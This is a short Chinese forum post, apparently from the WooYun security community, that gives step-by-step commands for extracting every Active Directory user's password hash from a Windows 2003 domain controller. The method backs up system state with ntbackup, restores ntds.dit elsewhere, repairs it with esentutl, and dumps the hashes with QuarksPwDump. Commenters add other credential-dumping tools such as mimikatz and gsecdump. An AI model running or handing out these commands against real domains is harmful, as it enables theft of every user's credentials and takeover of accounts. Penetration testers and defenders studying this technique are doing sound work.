1:在2003命令行里输入c:\>ntbackup

使用备份向导(高级)

选择只保存系统状态然后选择输出文件名

等待几分钟即可完成第一步

2:使用还原向导(高级)

选择你的刚才备份的文件,请单击“下一步”

选择恢复在另一个位置文件(C:\ test\为例)

然后选择恢复

等待几分钟即可完成  

3:命令行进入“C:\ test\[size=-1]Active Directory\”

输入以下两个命令即可导出所有AD用户hash

# esentutl /p ntds.dit                //我们需要用这个命令修复数据库

#C:\tmp2\QuarksPwDump.exe --dump-hash-domain --ntds-file C:\test\ntds.dit

source

乌云吐槽:

1#

ramos | 2013-08-28 21:28

这个唯一的缺点是动作太大,不过是在2008上抓是有用的方法。有的时候不需要抓全所有用户的密码,有几个域控的就行了,这个时候可以使用gcedump在2003的域控机器或者exchange服务器上抓。procdump和mimikatz结合也是可以的。

2#

冷冷的夜 (从前有个人,他不喜欢我;后来,他死了) | 2013-08-28 23:29

CAIN 绿色又环保

3#

Metasploit (admin@metasploit.com.cn) | 2013-08-29 08:20

@冷冷的夜 这个只能导出本地的 不能导出AD的

4#

冷冷的夜 (从前有个人,他不喜欢我;后来,他死了) | 2013-08-29 09:49

@Metasploit 可以的

留言评论(旧系统):

佚名 @ 2013-10-21 14:39:46

ntbackup 我命令写错了 请改下

本站回复:

嗯嗯,已修正!